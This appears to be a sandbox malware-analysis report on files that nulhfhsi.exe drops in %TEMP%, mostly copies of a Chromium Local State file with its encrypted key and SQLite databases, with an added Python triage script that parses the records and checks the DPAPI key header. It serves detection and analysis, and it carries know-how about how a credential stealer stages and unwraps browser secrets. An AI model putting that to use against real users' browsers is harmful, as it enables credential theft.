                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp6692.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp6D78.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp6D89.tmp
Process:C:\Users\user\AppData\Local\nulhfhsi.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):349054
Entropy (8bit):6.015923338738634
Encrypted:false
SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
Malicious:false
Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241

C:\Users\user\AppData\Local\Temp\tmp6DB9.tmp
Process:C:\Users\user\AppData\Local\nulhfhsi.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):20480
Entropy (8bit):0.698304057893793
Encrypted:false
SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
MD5:3806E8153A55C1A2DA0B09461A9C882A
SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
Malicious:false
Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp9573.tmp
Process:C:\Users\user\AppData\Local\nulhfhsi.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):40960
Entropy (8bit):0.792852251086831
Encrypted:false
SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:false
Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBF35.tmp
Process:C:\Users\user\AppData\Local\nulhfhsi.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):349054
Entropy (8bit):6.015923338738634
Encrypted:false
SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
Malicious:false
Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241

C:\Users\user\AppData\Local\Temp\tmpBF65.tmp
Process:C:\Users\user\AppData\Local\nulhfhsi.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBF66.tmp
Process:C:\Users\user\AppData\Local\nulhfhsi.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):349054
Entropy (8bit):6.015923338738634
Encrypted:false
SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
Malicious:false
Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241

C:\Users\user\AppData\Local\Temp\tmpE771.tmp
Process:C:\Users\user\AppData\Local\nulhfhsi.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE772.tmp
Process:C:\Users\user\AppData\Local\nulhfhsi.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):349054
Entropy (8bit):6.015923338738634
Encrypted:false
SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
Malicious:false
Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
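Added triage example, not part of the sandbox report: the ASCII files above are copies of a Chromium "Local State" style JSON (the preview's os_crypt.encrypted_key, password_manager and intl keys are Chromium Local State keys), written to %TEMP% by nulhfhsi.exe alongside SQLite databases whose origin the report does not name. The encrypted_key value begins with "RFBBUEk", base64 for "DPAPI", which is how Chromium on Windows tags the CryptProtectData blob wrapping its AES-256-GCM password key; that key can only be unwrapped on the victim host under the victim's logon session, which is why a stealer decrypts on-host rather than exfiltrating the files raw. The helper below parses records in the report's own Key:Value layout, groups them by SHA-256 (four of the previews above share one hash), finds the Local State copies, and checks the DPAPI header (tag, blob version 1, Microsoft's DPAPI provider GUID). The embedded records are a constructed, abridged copy of four entries above; the "staged in Temp" verdict is a heuristic of this example, not a sandbox signature.

```python
import base64
import binascii
import re
import struct
import uuid

# The encrypted_key value exactly as shown in the report's preview of tmp6D89.tmp.
LOCAL_STATE_KEY = (
    "RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCj"
    "ByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/nd"
    "eCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF"
    "7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"
)

# Constructed, abridged copy of four dropped-file records from the report (paths, process,
# file types, sizes and SHA-256 as listed there; previews shortened). Not sandbox output.
_TEMPLATE = r"""
C:\Users\user\AppData\Local\Temp\tmp6D89.tmp
Process:C:\Users\user\AppData\Local\nulhfhsi.exe
File Type:ASCII text, with very long lines, with no line terminators
Size (bytes):349054
SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
Preview: {"browser":{"shortcut_migration_version":"85.0.4183.121"},"os_crypt":{"encrypted_key":"<KEY>"},"password_manager":{"os_password_blank":true}}
C:\Users\user\AppData\Local\Temp\tmp6DB9.tmp
Process:C:\Users\user\AppData\Local\nulhfhsi.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Size (bytes):20480
SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
Preview: SQLite format 3......@ ....
C:\Users\user\AppData\Local\Temp\tmpBF35.tmp
Process:C:\Users\user\AppData\Local\nulhfhsi.exe
File Type:ASCII text, with very long lines, with no line terminators
Size (bytes):349054
SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
Preview: {"browser":{"shortcut_migration_version":"85.0.4183.121"},"os_crypt":{"encrypted_key":"<KEY>"},"password_manager":{"os_password_blank":true}}
C:\Users\user\AppData\Local\Temp\tmpBF65.tmp
Process:C:\Users\user\AppData\Local\nulhfhsi.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Size (bytes):73728
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
Preview: SQLite format 3......@ .......$....
"""
SAMPLE_RECORDS = _TEMPLATE.replace("<KEY>", LOCAL_STATE_KEY)

PATH_RE = re.compile(r"^[A-Za-z]:\\")
KEY_RE = re.compile(r'"encrypted_key"\s*:\s*"([A-Za-z0-9+/=]+)"')
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")  # Microsoft DPAPI provider GUID


def parse_dropped_files(text):
    """Split the report's flat Key:Value listing into one dict per dropped file.
    A record starts at a line that is a Windows path; 'Process:' and 'Preview:' values
    contain colons themselves, so only the first colon separates key from value."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if PATH_RE.match(line):
            current = {"path": line}
            records.append(current)
        elif current is not None and ":" in line:
            key, value = line.split(":", 1)
            current[key.strip()] = value.strip()
    return records


def inspect_encrypted_key(key_b64):
    """Decode the header of a Chromium os_crypt.encrypted_key value.
    Chromium on Windows stores base64("DPAPI" + CryptProtectData blob); the blob begins
    with a 4-byte version (1) followed by the 16-byte provider GUID (little-endian layout)."""
    if len(key_b64) < 36:
        return {"dpapi_wrapped": False}
    header = base64.b64decode(key_b64[:36])  # 36 chars -> 27 bytes: tag(5)+version(4)+guid(16)+2
    if header[:5] != b"DPAPI":
        return {"dpapi_wrapped": False}
    (version,) = struct.unpack_from("<I", header, 5)
    provider = uuid.UUID(bytes_le=header[9:25])
    try:
        blob_len = len(base64.b64decode(key_b64)) - 5  # None if the preview cut the key short
    except binascii.Error:
        blob_len = None
    return {"dpapi_wrapped": True, "blob_version": version, "provider_guid": str(provider),
            "provider_is_dpapi": provider == DPAPI_PROVIDER, "blob_len": blob_len}


def triage(records):
    """Group dropped files by hash and flag Local State + SQLite copies staged under %TEMP%."""
    by_hash = {}
    for r in records:
        by_hash.setdefault(r.get("SHA-256", "").upper(), []).append(r["path"])
    local_state = [r for r in records if KEY_RE.search(r.get("Preview", ""))]
    sqlite_dbs = [r for r in records if r.get("File Type", "").startswith("SQLite")]
    key_info = None
    if local_state:
        key_info = inspect_encrypted_key(KEY_RE.search(local_state[0]["Preview"]).group(1))
    staged = bool(local_state and sqlite_dbs) and all(
        "\\temp\\" in r["path"].lower() for r in local_state + sqlite_dbs)
    return {
        "unique_files": len(by_hash),
        "duplicate_groups": {h: p for h, p in by_hash.items() if len(p) > 1},
        "local_state_copies": [r["path"] for r in local_state],
        "sqlite_copies": [r["path"] for r in sqlite_dbs],
        "writers": sorted({r.get("Process", "") for r in records} - {""}),
        "key_info": key_info,
        "chromium_store_staged_in_temp": staged,  # heuristic of this example, not a sandbox signature
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(parse_dropped_files(SAMPLE_RECORDS)), indent=2))
```

Run against the full listing, the same parser collapses the four identical 349054-byte JSON copies to one hash, so the dedupe is what tells you how many distinct browser artefacts were actually touched rather than how many temp files the stealer churned through. The GUID check matters because a key that decodes to "DPAPI" but a different provider or version is not what Chromium writes and would point at a tampered or synthetic Local State.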

C:\Users\user\AppData\Local\Temp\tmpE7C1.tmp
Process: C:\Users\user\AppData\Local\nulhfhsi.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false

C:\Users\user\AppData\Local\Temp\tmpF3F.tmp
Process: C:\Users\user\AppData\Local\nulhfhsi.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 349054
Entropy (8bit): 6.015923338738634
Encrypted: false
SSDEEP: 6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
MD5: 8F78FB2B979EA740DEBFFA2E7C0C8BC1
SHA1: CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
SHA-256: 67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
SHA-512: 924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
Malicious: false
Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241

C:\Users\user\AppData\Local\Temp\tmpFBD.tmp
Process: C:\Users\user\AppData\Local\nulhfhsi.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false

C:\Users\user\AppData\Local\Temp\~DF0D69581CA4326ACC.TMP
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Category: dropped
Size (bytes): 34829
Entropy (8bit): 0.43316894516878646
Encrypted: false
SSDEEP: 48:kBqoxKAuvScS+GAVAVhVNIVNy7NY+3uZNmoshXoSD2w:kBqoxKAuvScS+GAVAVhVKVI72++TyL2w
MD5: 150B9EC81456D98B116FD8ADC9B9D46B
SHA1: 8320AA28759244472B1A7BD55BCE22E04631E125
SHA-256: 798DF166AA60096072E69107A1FC6826A1421B597E04C78A7326D7AFDC4DEE10
SHA-512: 9ED9B5C5C11905326E54D768EA912A481898047CEF118397D663F0681FE4224242C6BD97D35031D24A723A57ED9DF7B0A4193073AAE8EF202E52D30CE9457783
Malicious: false

C:\Users\user\AppData\Local\Temp\~DF2D25D182B81723B0.TMP
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: data
Category: dropped
Size (bytes): 12917
Entropy (8bit): 0.3979872906704968
Encrypted: false
SSDEEP: 24:c9lLh9lLh9lIn9lIn9loVB9loVh9lWVZeS7VSPhA:kBqoIVqV0VES7VSZA
MD5: 86A84E714CA2136CC3242127481C22ED
SHA1: 9DD51F570A7917AC140EE4222272E0957E5B64BA
SHA-256: 8EAC6096D18F05FFACBBDF9E2C41B9D8953344EC45FF63765D64C372392C7E91
